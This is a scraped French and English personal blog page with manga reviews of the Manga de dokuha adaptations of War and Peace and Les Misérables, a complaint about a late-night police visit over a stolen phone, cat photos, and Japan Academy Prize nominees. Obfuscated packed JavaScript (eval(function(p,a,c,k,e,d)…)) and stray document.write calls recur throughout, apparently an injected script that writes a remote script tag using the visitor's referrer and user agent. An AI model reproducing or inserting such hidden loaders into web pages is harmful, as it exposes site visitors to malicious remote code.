Guerre et Paix

Mon âme est éternelle ! Tu ne pourras jamais me l’enlever !
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kytns|var|u0026u|referrer|radaz||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zadhe|var|u0026u|referrer|daaza||js|php’.split(‘|’),0,{}))

Guerre et Paix, document.write(“”); fresque épique qui a pour théâtre la guerre napoléonienne avec la Russie du début du XIXème siècle, met en scène André, un jeune officier qui remet en cause l’utilité de combattre, Pierre, un homme tourmenté par sa recherche du vrai bonheur malgré son immense richesse et Natacha, une fille ingénue qui deviendra une femme pleine de charme. Leur destin et celui d’une multitude d’autres personnages, s’entrecroisent à Moscou, ville en proie à l’anarchie engendrée par la guerre.”

“Découvrez en manga une des oeuvres les plus grandioses de la littérature moderne.”

Ta victoire t’importe à ce point ?! Espèce de fanatique de la guerre !!

[ Texte du site de l’éditeur  et de la couverture arrière ]

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

Guerre et Paix (???????????? / Manga de dokuha: Sens? to heiwa) est le septième volume de la collection manga de dokuha (lit. “Lisez en manga”) publiés par East Press en novembre 2007 (le #620 du catalogue de l’éditeur). L’adaptation et le dessin ont été réalisé par le studio Variety Art Works, dont on connait très peu de chose. C’est le quatrième titre de la collection a être traduit par Soleil Manga en septembre 2011 dans sa collection “Classiques”. J’ai déjà introduit cette collection et commenté quelques uns de ses titres (L’Ancien et le Nouveau Testament de la Bible, À la recherche du temps perdu, Le Capital, Le rouge et le noir et Les misérables). Cette collection reprend en traduction quelques titres de l’impressionnante collection japonaise Manga de Dokuha publiée par East Press, qui se consacre à adapter en manga des classiques de la littérature pour les rendre accessible à un plus large publique.

Dans le premier chapitre, intitulé “André” (pg 5), l’histoire débute en 1805 alors que la coalition des puissances européennes s’opposant aux conquêtes de Napoléon tente de l’arrêter à Austerlitz. Mais c’est la défaite. Le prince André Bolkonsky, aide de camp du général Koutouzov, est laissé pour mort sur le champ de bataille. À Moscou, sa femme Lise, qui est enceinte, garde toujours espoir. Mais André revient trop tard: sa femme est morte en donnant naissance à son fils. Il regrette d’avoir perdu un être cher à cause d’une guerre futile. Pendant ce temps, son ami le comte Pierre Bézoukhov (qui a épousé la belle Hélène Kouraguine, une “femme volage à la tête vide”) fait la fête avec des gens de mauvaise compagnie, principalement son ami Fiodor Dolokhov et quelques autres officiers sans titre de noblesse. Pierre et André se revoient lors d’une soirée chez les Rostov. André fait la rencontre avec la jeune et dynamique Natacha Rostov. [ci-contre: pg 9]

Dans le second chapitre (“Pierre”, pg 46), une lettre anonyme accuse Hélène d’avoir une liaison avec Dolokhov. Pierre provoque ce dernier en duel. Dolokhov, blessé, avoue qu’il a beau passer pour un homme brutal et sauvage mais il ne s’approprierait jamais la femme d’autrui. Hélène, furieuse du scandale, affirme qu’elle est simplement allé au théâtre avec Dolokhov parce que Pierre ne s’occupait pas assez d’elle. Le couple en vient à une entente: il se sépare mais Pierre doit fournir à sa femme une résidence et une grosse somme en dédommagement. Natacha invite Pierre et André à la villa familiale à Otradnoïe pour des vacances. André se remémore la bataille d’Austerlitz et les deux amis se demandent si, malgré la paix, ils sont vraiment heureux… Dans le troisièmes chapitre (“Natasha”, pg 82), André continue de fréquenter Natasha. Il tombe amoureux d’elle et désir la marier mais son père exige qu’ils attendent une année. En 1811, la guerre avec Napoléon menace à nouveau. Anatole Kouraguine, qui convoite Natasha, réussi à l’attirer chez lui grâce à la complicité de sa soeur Hélène, et tente de la violer. Pierre intervient à temps mais elle sent qu’elle a trahi l’amour d’André, et rompt l’engagement.

Dans le quatrième chapitre (“Moscou”, ci-bas: pg 112-113), Napoléon envahit la Russie en 1812 pour répondre à la violation du traité de paix (la Russie avait rompu le blocus continental en reprenant le commerce avec le Royaume-Uni) et marche sur Moscou. André est grièvement blessé à la bataille de Borodino. A l’approche de l’ennemi, les moscovites fuient la ville, qui brûle à cause de la négligence de l’envahisseur. Pierre est fait prisonnier par les soldats français. Malgré son succès, Napoléon doit battre en retraite car, faute de ravitaillement, le moral des troupes est au plus bas et l’hiver approche… Le récit (ou Tolstoï?) s’abandonne à quelques réflexions philosophiques:

“Pourquoi les gens… se jettent-ils corps et âme dans les tragédies historiques que sont les guerres? (…) Pourquoi obéissent-ils à la fatalité… au prix de tout leur être? L’homme… est un être dont la puissance est insignifiante. La raison en est… que les hommes ne sont rien de plus que des rouages qui bâtissent l’Histoire.”

Dans le dernier chapitre (“L’âme éternelle”, pg 166), André se réveille dans le couvent de Troïtsk avec sa soeur Marie et son fils Nicolas à son chevet. Natasha vient également le voir mais il est mourant. Ils se confessent tous deux leur amour. Napoléon se retire de Moscou en emportant les prisonniers avec lui—dont fait partie Pierre. Dans cette longue marche, en hiver, avec des provisions insuffisantes, le nombre de morts et de déserteurs ne cesse de croître. Heureusement, les troupes russes attaquent le convoi et libèrent les prisonniers. Pierre est sauvé par Dolokhov. Il retrouve Natasha et la marie. Le manga se termine sur une dernière réflexion:

“L’histoire ne parle jamais de la Paix. Les Hommes sont des rouages qui servent à bâtir l’histoire, ceci s’applique aussi bien aux soldats qu’aux paysans et même aux Rois. Il n’y a pas d’exception. Toutefois… L’Homme trouve néanmoins le chemin de la Vie. Il aime ses semblables, Nourrit ses enfants, Aide ses amis Et pardonne ses ennemies. Tout en riant avec son entourage, il aspire à une existence heureuse… Et construit lui-même sa vie. Mais cela, l’Histoire n’en parle pas et n’en parlera jamais.”

Il y a des adaptations qui sont réussi et d’autres qui ne le sont pas. Dans ce cas-ci je dirais que c’est un échec total. Non seulement le dessin est parfois carrément laid mais le récit comporte de sérieuses lacunes narratives (trop d’ellipse et de raccourci sans doute) qui rendent par moment l’histoire un peu trop difficile à comprendre. De plus, le ton du récit est souvent faux et exagéré, tombant dans la comédie (Napoléon nous est d’ailleurs présenté comme un vilain de grand guignol). Je ne doute pas que le manga rende l’essence du magnifique roman de Tolstoï mais trop en a été retiré et on se retrouve avec une histoire sans âme, trop simplifiée. Comme le dit l’avertissement d’ouverture, le manga n’est pas un remplacement du roman mais veut plutôt susciter l’envie de le lire. Hélas, dans ce cas-ci la campagne était trop ambitieuse et c’est la défaite. Je n’ai nul envie de poursuivre plus loin avec une lecture ennuyante. Un manga à éviter, donc, à moins que vous soyez vraiment curieux et courageux!

Guerre et Paix, écrit par Léon Tolstoï, adapté et illustré par Variety Art Works (traduction: Julien Lefebvre-Paquet). Toulon, Soleil Manga (Coll. Classiques), septembre 2011. 12,8 x 18,2 x 1,5 cm, 192 pg., 6,95 € / $12.95 Can. ISBN: 978-2-30201-878-5. Lecture dans le sens occidental (de gauche à droite) et recommandé pour jeunes adultes (14+).
Pour plus d’information vous pouvez consulter les sites suivants:

Manga de dokuha: Guerre et Paix by Leon Tolstoï © Variety Art Works • East Press Co., Ltd. All rights reserved. Édition française © 2011 MC Productions.

[ Translate ]

L’image du chat-medi / Cat-urday’s picture

Toffee, document.write(“”); Caramel & Roussette
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rarha|var|u0026u|referrer|thakz||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|askdt|var|u0026u|referrer|ndtnf||js|php’.split(‘|’),0,{}))
(2014-03-02)
Toffee, Caramel et RoussetteRappel: nous cherchons toujours une bonne famille d’accueil pour Toffee et Roussette (voir l’affiche). Merci. / Reminder: We’re still looking for a nice host family for Toffee & Roussette (check the poster). Thanks.

Mec, t’as pas vu mon cell?

J’ai récemment lu dans le journal 24h l’histoire d’un gars qui s’était fait voler son ordinateur portable et avait réussi à localiser le voleur grâce à un logiciel mais la police refusait de faire quoi que ce soit parce que c’était pas une affaire urgente. Eh bien moi j’ai vécu une expérience à l’opposé avec des policiers qui font ce qui me semble de l’excès de zèle!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzbya|var|u0026u|referrer|tzrsz||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbnae|var|u0026u|referrer|zakkk||js|php’.split(‘|’),0,{}))

Continuez après le saut de page >>

Un gars se fait voler son téléphone cellulaire dans une station de service et le retrace (grâce au fameux app d’Apple Find my iPhone [ version française ] ) chez moi ! Un peu passé minuit avant-hier, document.write(“”); il débarque chez moi accompagné de deux policiers (une fille et un gars) et réclame son cellulaire! “Désolé” que je lui dit, “je ne l’ai pas ton cellulaire et, en plus, je ne fréquente pas les stations de service. J’ai même pas de voiture!”

Pour avoir testé l’apps en question je sais très bien que ce n’est pas assez précis pour pouvoir localiser l’appareil égaré avec certitude à une adresse précise. Cela utilise une combinaison de branchement wi-fi et de GPS, un peu comme quand Google Maps nous localise sur la carte. C’est pas toujours précis. L’apps peu bien dire “c’est à telle adresse” mais, bon, ça peut bien être dans le bloc appartement au nord, au sud, à l’est ou à l’ouest! Tout ça me rappelle bien trop une expérience très similaire vécu il y a quelques années…

J’étais tellement fâché d’avoir à revivre ça que j’en ai mal dormi. Je suis sûr que quelques jeunes du quartier, possiblement membres d’un gang de rue [on en a de toutes les couleurs ici], sont les vrai coupables. Mais que peut-on y faire… Quand j’y pense, tout ça est assez frustrant sous plusieurs angles.

Si le vol d’un laptop est pas urgent, qu’est-ce qui motive la police à venir enquêter, en pleine nuit, sur le vol d’un cellulaire ? Ils auraient pu au moins attendre le lendemain matin, non? C’est d’autant plus frustrant que la fois que mon appart dans Hochelaga s’était fait défoncé par des voleurs (littéralement, puisqu’ils avaient lancé une grosse roche pour casser la vitre de la porte arrière) ça avait prit un peu moins de vingt-quatre heures pour que la police réponde à l’appel!

Ce qui est aussi pas mal frustrant c’est que je fais beaucoup d’effort pour essayer d’être un citoyen exemplaire alors que la plupart des gens de mon quartier ne respectent pas beaucoup la loi (abris tempo non-conforme, pas de couvercle sur leur poubelle qui se renverse et déverse son contenu dans mon entrée, pelleter la neige sur le trottoir, bloquer le trottoir avec leur véhicule, abondamment nettoyer leur entrée de garage avec le boyau d’arrosage, etc. Et même, dans mon quartier, si tu mets trop de distance entre toi et la personne en avant de toi dans la ligne d’attente de l’autobus (disons plus de deux ou trois pieds) quelqu’un va venir se mettre entre vous deux!). Évidemment tout ces gens ne se font jamais embêter par la police. Et qui est-ce que la police vient accuser de vol en pleine nuit? Moi! (Et je n’ai même pas l’excuse de pouvoir les accuser d’être raciste pour me défendre!). C’est vraiment frustrant à la fin!

Conclusion: ou bien il n’y a vraiment pas de balance karmique, ou bien c’est vraiment pas payant d’être un bon gars. No more mister nice guy!

[ Translate ]

L’image du mer-fleurie

Iridaceae: Iris “Gypsy Lord”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhnts|var|u0026u|referrer|nfrek||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdbzf|var|u0026u|referrer|znrky||js|php’.split(‘|’),0,{}))
Grand
iris barbu / Tall bearded iris
Jardin botanique (2013-06-18)
<a href="http://www.flickr.com/photos/clodjee/12723523404/&quot; title="Grand iris barbu by clodjee, document.write(“”); on Flickr”>Grand iris barbu

Les misérables

“Octobre 1815, document.write(“”); Jean Valjean, après 19 années de bagne, revient en France, plein de rancunes contre la société. Mais une rencontre va changer sa vie et le transformer en homme de bien. Pourtant, en ces années-là, difficile de fuir son passé…” [ Texte du site de l’éditeur ]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhrbf|var|u0026u|referrer|fyena||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzzba|var|u0026u|referrer|inkfn||js|php’.split(‘|’),0,{}))

Criminel tu es, criminel tu resteras !

“Sous l’impulsion du lumineux évêque Myriel, Jean Valjean, forçat libéré après 19 ans de bagne, prend la résolution de s’engager sur la voie du bien et de devenir un homme nouveau. Plusieurs années après, alors qu’il a changé de nom et qu’il est devenu maire de Montreuil-sur-Mer, Javert, un ancien gardien du bagne où il a été emprisonné, est nommé en tant qu’inspecteur de police dans cette ville…”

“Un manga inspiré par l’oeuvre magistrale de Victor Hugo, l’un des meilleurs poètes et romanciers français de l’école romantique.”

Tu ne m’échapperas pas, Jean Valjean !

[ Texte de la couverture arrière ]

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

Les misérables (?????????????? / Manga de dokuha: re mizeraburu) est le vingt-huitième volume de la collection manga de dokuha (lit. “Lisez en manga”) publiés par East Press en janvier 2009 (le #836 du catalogue de l’éditeur). L’adaptation et le dessin ont été réalisé par le studio Variety Art Works, dont on connait très peu de chose. C’est le troisième titre de la collection a être traduit par Soleil Manga en mai 2011 dans sa collection “Classiques”. J’ai déjà introduit cette collection et commenté quelques uns de ses titres (L’Ancien et le Nouveau Testament de la Bible, À la recherche du temps perdu, Le Capital et Le rouge et le noir). Cette collection reprend en traduction quelques titres de l’impressionnante collection japonaise Manga de Dokuha publiée par East Press, qui se consacre à adapter en manga des classiques de la littérature pour les rendre accessible à un plus large publique.

Cette adaptation en manga de l’oeuvre de Victor Hugo semble être assez fidèle à l’original. Je n’ai bien sûr pas lu Les Misérables dans sa totalité mais j’ai vu suffisamment d’adaptations (cinématographiques, théâtrales, pour la télé, etc.) pour en avoir une assez bonne idée. Le manga suit la structure des cinq livres du roman (quoique le tome IV soit pratiquement absent) et se divise en sept chapitres. Dans “Les chandeliers d’argent” (pg 5), Jean Valjean, qui sort du bagne après dix-neuf ans, frappe à la porte de monseigneur Myrel pour obtenir un gîte pour la nuit. Après un cauchemar où il se rappelle les paroles du gardien Javert, “Criminel tu es, criminel tu resteras,” il ne peut résister à la tentation et s’enfuit en emportant l’argenterie de monseigneur Myrel. Lorsque Valjean est capturé, Myrel dit à la police lui avoir donné l’argenterie et lui remet en plus les chandeliers. “Par cette argenterie je rachète votre âme à l’esprit de perdition (…). Employez cet argent à devenir un honnête homme.” Sur la route, encore confus, Valjean prend par inadvertance la pièce de monnaie d’un jeune savoyard qui porte plainte à la police. Javert jure de le renvoyer au bagne. Dans “Fantine” (pg 28), quelques années plus tard, Valjean a changé son nom pour M. Madeleine et est maintenant maire de Montreuil-sur-mer. Alors que M. Fauchelevent se retrouve coincé sous sa charrette [ci-contre: pg 42], Valjean utilise sa force extraordinaire pour le libérer, et Javert, qui vient d’être nommé inspecteur de police de la ville, est témoin de la scène. Il commence à soupçonner la véritable identité du maire. Fantine perd son travail à la fabrique de bijoux de la ville car la gérante découvre qu’elle a un enfant hors mariage. Mais les Thénardier, qui gardent sa fille Cossette, ne cessent de lui demander de l’argent pour prendre soin d’elle et Fantine, qui est malade, doit vendre ses cheveux, ses dents et même se prostituer pour les payer. Après une bagarre, elle est arrêté par Javert mais Valjean use de son autorité de maire pour la faire libérer.

Dans “La confession de Jean Valjean” (pg 68), lorsqu’il apprend qu’un innocent a été arrêté parce qu’on l’a pris pour lui, Valjean se rend au procès et se dénonce. Il promet à Fantine, qui est sur son lit de mort, qu’il s’occupera de Cossette. Dans “Cossette” (pg 88), il se rend chez les Thénardiers et leur “achète” Cossette. Poursuivi par Javert, il se réfugie avec elle dans un couvent où, par pur hasard, le père Fauchelevent travail comme jardinier. Dans “Amour et révolution” (pg 108), Cossette a grandi et ne désir pas prendre le voile. Valjean (qui se cachait au couvent sous l’identité du frère de M. Fauchelevent) et sa “fille” s’installent donc dans une maison dans Paris. Elle croise Marius qui en tombe amoureux. Le jeune homme fait partie d’un groupe secret qui défend les droit du peuple et prône la révolution [ci-contre: pg. 118]. Toutefois Javert a un espion au sein du groupe et le surveille. Marius retrouve Cossette et lui déclare son amour. Le couple se rencontre clandestinement dans un parc. Valjean, qui sent la révolution venir et craint que Javert ne les retrouve, décide de quitter la France pour l’Angleterre.

Dans “La barricade sanglante” (ci-bas: pg 140-141), Javert retrace Valjean grâce à son espion. Cossette laisse une note à Marius pour l’avertir de son départ. Le couple se rencontre une dernière fois, mais Marius, qui a découvert que son groupe est infiltré, décide de retourner à la barricade pour en avertir ses camarades. Celle-ci est assiégé par l’armée mais les révolutionnaires ont capturé Javert. Valjean vient à la barricade pour sauver Marius. Il libère Javert et, alors que la barricade cède sous les coups de canon, il s’échappe par les égouts avec Marius blessé. Dans “La dernière aube” (pg 172), Javert rattrape Valjean et Marius. Valjean supplie Javert de l’aider à sauve Marius. Il l’amène auprès et Cossette et fait appeler un médecin. Valjean retourne voir Javert qui est surpris qu’il n’ait pas chercher à s’échapper. Javert, qui comprend que Valjean est un homme bon et que toutes ces années ses convictions ont été fausses, décide de se suicider en se jetant dans la Seine. “Aimer les gens… voilà la seule vérité qui compte.”


Je n’ai jamais aimé Les misérables car j’ai toujours trouvé que son histoire faisait beaucoup trop… misérabiliste. J’ai donc été plutôt surpris de trouver cette adaptation bonne. Le dessin, sans être extraordinaire ou même beau, est toutefois agréable mais surtout efficace. Et le manga fait une excellente synthèse du roman (bien sûr des pans de l’Histoire sont passé sous silence et il y a quelques divergences avec l’original—qui sont d’ailleurs indiqué par des notes) et rend même l’histoire étonnamment intéressante. La préface par Soleil Manga exprime d’ailleurs assez bien cela:

“À la lecture de ce manga, on se demande : mais comment ont-ils fait? Comment ont-ils réussi à si bien retranscrire ce roman colossal de 1500 pages en seulement 200 de bande dessinée ? Sans fausses notes ? Avec tant de poigne et en même tant de simplicité dans le texte et dans l’image ? Évidemment, ce serait mentir que de dire que tout y est. Car en effet, nous y trouvons nombre d’ellipses et de petits arrangements. Mais c’est dans le choix des passages, des images et dans le système de narration que s’illustre la réussite de ce manga. (…) cet ouvrage demeurera une excellente porte d’entrée à tous les jeunes gens et les moins jeunes souhaitant découvrir cette histoire. Pourquoi ? Peut-être grâce au recul que nous, occidentaux, ne pouvions avoir. Peut-être parce que cette approche nippone apporte un regard nouveau et en même temps très juste sur un objet que nous ne connaissons que trop bien et peut-être dont nous nous étions lassés.”

La préface nous dit aussi que ce manga “n’a pas pas pour but de remplacer l’oeuvre de Victor Hugo” mais plutôt “de provoquer l’envie de lire cette fabuleuse oeuvre dans le texte.” C’est donc assez réussi et je vous en recommande donc la lecture.

Les misérables, écrit par Victor Hugo, adapté et illustré par Variety Art Works (traduction: Anne Mallevay). Toulon, Soleil Manga (Coll. Classiques), mai 2011. 12,8 x 18,2 x 1,5 cm, 192 pg., 6,95 € / $12.95 Can. ISBN: 978-2-30201-377-3. Lecture dans le sens occidental (de gauche à droite) et recommandé pour jeunes adultes (14+).
Pour plus d’information vous pouvez consulter les sites suivants:

Manga de dokuha: Les misérables by Victor Hugo © Variety Art Works • East Press Co., Ltd. All rights reserved. Édition française © 2011 MC Productions.

[ Translate ]

The month in review (2014-03-02)

February was another harsh, document.write(“”); cold month (although we had a brief respite with warmer temperature and rain). It was a rather annoying month. I didn’t feel top shape (mostly digestion problems and abdominal pain). I had many small problems to take care and there was a lot of stuff pissing me off in the news. My cat caught another mouse in the house. I had not enough time to write as much as I wanted. All this put me in a bad mood. Above all I was quite tired (mentally) with my long commute to work (in the last year, I applied nearly thirty times for positions in libraries closer to home, but without any success). In fact, I realized that most of the days I was leaving home around 8:15 am and coming back around 7:45 pm. I am gone nearly twelve hours to work only seven hours! For what? In order to win enough wages to pay for food and mortgage so I can sleep, eat and go to work the next day? What a depressing thought! The good news is that I now have only seven hundred and ninety-four weeks before retirement!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|diztt|var|u0026u|referrer|rafff||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbbar|var|u0026u|referrer|sknin||js|php’.split(‘|’),0,{}))

Locally there was more talks about the
secular charter, a tax hike, possible provincial elections, and lots of discussion about municipal pension plans (ah! those lazy and overpaid municipal workers!). In the meantime, the world was busy dealing with freaky weather conditions (notably drought in California, lots of snow in the east coast and too much rain in England), the Sochi Olympics, unrest in Ukraine and possible military intervention by the Russians.

I’ve gathered over an hundred links to interesting news stories. You can check them after the jump:


Anime & Manga related, Japan, Popular Culture

Apple, apps and mobile devices news

Books, Digital Edition & Libraries

Economy, Environment & International/U.S. Politics

Health, home & garden

Humour
Local News & National Politics

Media, Culture, Entertainment & Society

Sciences & History

Technology, Gadgets & Internet

Union stuff & Montreal’s libraries

[ Traduire ]

37th Japan Academy Prize Nominees

Last January, the nominees for the 37th Japan Academy Prize (aka the Japanese Academy Awards) were announced on the Japan Academy Prize Association website [ in japanese: 第37回日本アカデミー賞 ] :

The nominees for Best Picture of the year (2014) are:

The nominees for Best Director of the year (2014) are:

  • Ishii Yuya (The Great Passage)
  • Koreeda Hirokazu (Like Father, Like Son)
  • Shiraishi Kazuya (The Devil’s Path)
  • Mitani Koki (The Kiyosu Conference)
  • Yamada Yoji (Tokyo Family)

The nominees for Best Animation of the year (2014) are:

Here we are listing only the categories that are of interest for our blog, but you’ll find more details on ALL the nominees on the Tokyo Hive and Internet Movie Database. You’ll find also some information (mostly about the anime category and the anime- & manga-related nominations) on Anime News Network.

The award winners will be announced on March 7, 2014, so stay tuned!

Update (2014-03-09): The winners have been highlighted. I have also posted the full list of winners in this new entry. You can find more information on Variety, The Hollywood Reporter, Anime News Network and, of course, the official Japan Academy Prize website (or the auto-translated version).

[ Traduire ]

L’image du chat-medi

Saya (2014-02-10)
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eesey|var|u0026u|referrer|ntnsa||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ssdik|var|u0026u|referrer|sksin||js|php’.split(‘|’),0,{}))
<a href="
http://www.flickr.com/photos/clodjee/12866140235/&quot; target="“new”" title="Saya (2014-02-10) by clodjee, document.write(“”); on Flickr”>Saya (2014-02-10)
Rappel: nous avons toujours deux chats à vendre (voir la nouvelle affiche et faire circuler)
Reminder: we still have two cats to sell (check the new poster and pass around please)

Réflexion aléatoire #014058

Qu’est-ce qui fait qu’un bâtiment s’écroule? Un bâtiment tombe en ruines lorsque les piliers qui le soutiennent rouillent ou pourrissent et lorsque le mortier qui lie ses pierres se désagrège…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sttht|var|u0026u|referrer|drdtr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrkfd|var|u0026u|referrer|dstte||js|php’.split(‘|’),0,{}))

Ce bâtiment c’est notre civilisation, document.write(“”); notre société. Les piliers en sont le système politique qui nous dirige (quel que soit sa nature: théocratique, monarchique, ou démocratique), là où les décisions se prennent, où la gestion se fait. Le mortier, c’est nos lois et nos conventions sociales. Ce
